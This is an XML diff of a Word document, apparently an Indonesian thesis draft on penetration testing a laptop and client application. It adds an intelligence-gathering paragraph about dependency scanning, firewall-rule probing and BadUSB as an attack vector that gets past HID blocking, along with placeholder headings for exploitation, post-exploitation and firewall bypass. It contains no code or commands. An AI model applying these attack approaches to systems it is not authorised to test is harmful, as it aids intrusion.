+            <w:tcW w:w="5426" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Pengambilan dan pemindahan data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> internal</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1978" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="857" w:type="dxa"/>
+            <w:vMerge/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5426" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Reference"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>Pengumpulan dan penyajian data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> internal</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="H3"/>
@@ -39899,8 +43427,9 @@
         </w:numPr>
         <w:spacing w:before="0" w:after="0"/>
       </w:pPr>
-      <w:bookmarkStart w:id="112" w:name="_Toc117497888"/>
-      <w:r>
+      <w:bookmarkStart w:id="115" w:name="_Toc117497888"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>4.3.2</w:t>
       </w:r>
       <w:r>
@@ -39909,22 +43438,161 @@
       <w:r>
         <w:t>Intelligence Gathering</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="112"/>
+      <w:bookmarkEnd w:id="115"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">[ dalemin info info aplikasi gui + sistem client ] </w:t>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tahap </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ini digunakan penulis untuk mengumpulkan informasi terkait target pengujian yang kiranya relevan pada tahap pengukuran kerentanan </w:t>
+      </w:r>
+      <w:r>
+        <w:t>serta</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> eksploitasi. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Terdapat </w:t>
+      </w:r>
+      <w:r>
+        <w:t>dua pendekatan yang berbeda untuk mendapatkan informasi inti dari</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> targert pengujian. Pada sisi aplikasi target, pencarian informasi dilakukan </w:t>
+      </w:r>
+      <w:r>
+        <w:t>dengan</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> pengecekan validasi input pengguna dan pemindaian kerentanan pada dependensi di dalamnya.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Sedangkan </w:t>
+      </w:r>
+      <w:r>
+        <w:t>pada sisi sistem target,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> informasi diambil melalui pemindaian terhadap presensi dan aturan firewall yang kiranya </w:t>
+      </w:r>
+      <w:r>
+        <w:t>tersedia</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dikarenakan </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">sistem target </w:t>
+      </w:r>
+      <w:r>
+        <w:t>berupa</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> laptop, maka serangan vektor </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>BadUSB</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> tidak menjadi hambatan besar terhadap </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">adanya </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">pemblokiran akses perangkat HID, yang mana berbeda dengan </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">protokol untuk </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>media storage</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body"/>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+      </w:pPr>
+      <w:r>
+        <w:t>[ dalemin info info aplikasi gui</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (3)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> + sistem client </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">(1) </w:t>
+      </w:r>
+      <w:r>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+      </w:pPr>
       <w:r>
         <w:t xml:space="preserve">[ OWASP dependency check ] </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+      </w:pPr>
+      <w:r>
+        <w:t>[ OSSIndex Maven ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+      </w:pPr>
+      <w:r>
+        <w:t>[ VirusTotal ]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -39933,7 +43601,13 @@
         <w:spacing w:after="170"/>
       </w:pPr>
       <w:r>
-        <w:t>[ OSSIndex Maven ]</w:t>
+        <w:t>{ Nmap Determinte Firewall Rules</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> &amp; Bypass</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> ]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -39945,7 +43619,7 @@
         </w:numPr>
         <w:spacing w:before="0" w:after="0"/>
       </w:pPr>
-      <w:bookmarkStart w:id="113" w:name="_Toc117497889"/>
+      <w:bookmarkStart w:id="116" w:name="_Toc117497889"/>
       <w:r>
         <w:t>4.3.3</w:t>
       </w:r>
@@ -39955,7 +43629,7 @@
       <w:r>
         <w:t>Threat Modelling</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="113"/>
+      <w:bookmarkEnd w:id="116"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -39999,7 +43673,7 @@
         </w:numPr>
         <w:spacing w:before="0" w:after="0"/>
       </w:pPr>
-      <w:bookmarkStart w:id="114" w:name="_Toc117497890"/>
+      <w:bookmarkStart w:id="117" w:name="_Toc117497890"/>
       <w:r>
         <w:t>4.3.4</w:t>
       </w:r>
@@ -40009,7 +43683,7 @@
       <w:r>
         <w:t>Vulnerability Analysis</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="114"/>
+      <w:bookmarkEnd w:id="117"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -40069,8 +43743,9 @@
         </w:numPr>
         <w:spacing w:before="0" w:after="0"/>
       </w:pPr>
-      <w:bookmarkStart w:id="115" w:name="_Toc117497891"/>
-      <w:r>
+      <w:bookmarkStart w:id="118" w:name="_Toc117497891"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>4.3.5</w:t>
       </w:r>
       <w:r>
@@ -40079,7 +43754,7 @@
       <w:r>
         <w:t>Exploitation</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="115"/>
+      <w:bookmarkEnd w:id="118"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -40107,7 +43782,7 @@
         </w:numPr>
         <w:spacing w:before="0" w:after="0"/>
       </w:pPr>
-      <w:bookmarkStart w:id="116" w:name="_Toc117497892"/>
+      <w:bookmarkStart w:id="119" w:name="_Toc117497892"/>
       <w:r>
         <w:t>4.3.6</w:t>
       </w:r>
@@ -40117,7 +43792,7 @@
       <w:r>
         <w:t>Post-Exploitation</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="116"/>
+      <w:bookmarkEnd w:id="119"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -40145,7 +43820,7 @@
         </w:numPr>
         <w:spacing w:before="0" w:after="0"/>
       </w:pPr>
-      <w:bookmarkStart w:id="117" w:name="_Toc117497893"/>
+      <w:bookmarkStart w:id="120" w:name="_Toc117497893"/>
       <w:r>
         <w:t>4.3.7</w:t>
       </w:r>
@@ -40155,7 +43830,7 @@
       <w:r>
         <w:t>Reporting</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="117"/>
+      <w:bookmarkEnd w:id="120"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -40185,7 +43860,7 @@
         <w:pStyle w:val="H2"/>
         <w:spacing w:before="0" w:after="0"/>
       </w:pPr>
-      <w:bookmarkStart w:id="118" w:name="_Toc117497894"/>
+      <w:bookmarkStart w:id="121" w:name="_Toc117497894"/>
       <w:r>
         <w:t>4.4</w:t>
       </w:r>
@@ -40198,7 +43873,7 @@
       <w:r>
         <w:t>Kerentanan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="118"/>
+      <w:bookmarkEnd w:id="121"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -40270,6 +43945,7 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>BAB V</w:t>
       </w:r>
     </w:p>
@@ -40278,18 +43954,18 @@
         <w:pStyle w:val="H1"/>
         <w:spacing w:before="0" w:after="240"/>
       </w:pPr>
-      <w:bookmarkStart w:id="119" w:name="_Toc117497895"/>
+      <w:bookmarkStart w:id="122" w:name="_Toc117497895"/>
       <w:r>
         <w:t>PENUTUP</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="119"/>
+      <w:bookmarkEnd w:id="122"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="H2"/>
         <w:spacing w:before="0" w:after="0"/>
       </w:pPr>
-      <w:bookmarkStart w:id="120" w:name="_Toc117497896"/>
+      <w:bookmarkStart w:id="123" w:name="_Toc117497896"/>
       <w:r>
         <w:t>5.1</w:t>
       </w:r>
@@ -40299,7 +43975,7 @@
       <w:r>
         <w:t>Kesimpulan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="120"/>
+      <w:bookmarkEnd w:id="123"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -40318,7 +43994,7 @@
         <w:pStyle w:val="H2"/>
         <w:spacing w:before="0" w:after="0"/>
       </w:pPr>
-      <w:bookmarkStart w:id="121" w:name="_Toc117497897"/>
+      <w:bookmarkStart w:id="124" w:name="_Toc117497897"/>
       <w:r>
         <w:t>5.2</w:t>
       </w:r>
@@ -40328,7 +44004,7 @@
       <w:r>
         <w:t>Saran</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="121"/>
+      <w:bookmarkEnd w:id="124"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -40340,6 +44016,12 @@
       <w:r>
         <w:t>[ abc ]</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:after="170"/>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -40358,11 +44040,12 @@
         <w:pStyle w:val="H1"/>
         <w:spacing w:before="0" w:after="240"/>
       </w:pPr>
-      <w:bookmarkStart w:id="122" w:name="_Toc117497898"/>
-      <w:r>
+      <w:bookmarkStart w:id="125" w:name="_Toc117497898"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>DAFTAR PUSTAKA</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="122"/>
+      <w:bookmarkEnd w:id="125"/>
     </w:p>
     <w:sdt>
       <w:sdtPr>
@@ -40920,6 +44603,7 @@
             <w:rPr>
               <w:rFonts w:eastAsia="Times New Roman"/>
             </w:rPr>
+            <w:lastRenderedPageBreak/>
             <w:t xml:space="preserve">Kaushik, K., Aggarwal, S., Mudgal, S., Saravgi, S., &amp; Mathur, V. (2021). A Novel Approach to Generate a Reverse Shell: Exploitation and Prevention. </w:t>
           </w:r>
           <w:r>
@@ -41559,6 +45243,7 @@
             <w:rPr>
               <w:rFonts w:eastAsia="Times New Roman"/>
             </w:rPr>
+            <w:lastRenderedPageBreak/>
             <w:t xml:space="preserve">Shevchenko, N., Chick, T. A., O’riordan, P., Scanlon, T. P., &amp; Woody, C. (2018). </w:t>
           </w:r>
           <w:r>
@@ -47317,6 +51002,7 @@
     <w:rsidRoot w:val="00896985"/>
     <w:rsid w:val="0003496D"/>
     <w:rsid w:val="00082DA6"/>
+    <w:rsid w:val="00152E5B"/>
     <w:rsid w:val="00177AC1"/>
     <w:rsid w:val="0018700D"/>
     <w:rsid w:val="00187955"/>
@@ -47326,6 +51012,7 @@
     <w:rsid w:val="002631B8"/>
     <w:rsid w:val="002C186A"/>
     <w:rsid w:val="004859B8"/>
+    <w:rsid w:val="005636CC"/>
     <w:rsid w:val="005B088D"/>
     <w:rsid w:val="005E197B"/>
     <w:rsid w:val="006544C4"/>
@@ -47343,7 +51030,10 @@
     <w:rsid w:val="009D2B4B"/>
     <w:rsid w:val="009F6D07"/>
     <w:rsid w:val="00A75180"/>
+    <w:rsid w:val="00AC68C6"/>
     <w:rsid w:val="00AD6E43"/>
+    <w:rsid w:val="00B94566"/>
+    <w:rsid w:val="00BB6986"/>
     <w:rsid w:val="00BC1D30"/>
     <w:rsid w:val="00BC74AF"/>
     <w:rsid w:val="00BE22C1"/>
@@ -47351,6 +51041,7 @@
     <w:rsid w:val="00E35B14"/>
     <w:rsid w:val="00EA3329"/>
     <w:rsid w:val="00EB31B7"/>
+    <w:rsid w:val="00F2333B"/>
     <w:rsid w:val="00FA3FC5"/>
     <w:rsid w:val="00FA42E9"/>
     <w:rsid w:val="00FE223F"/>

</xml_diff>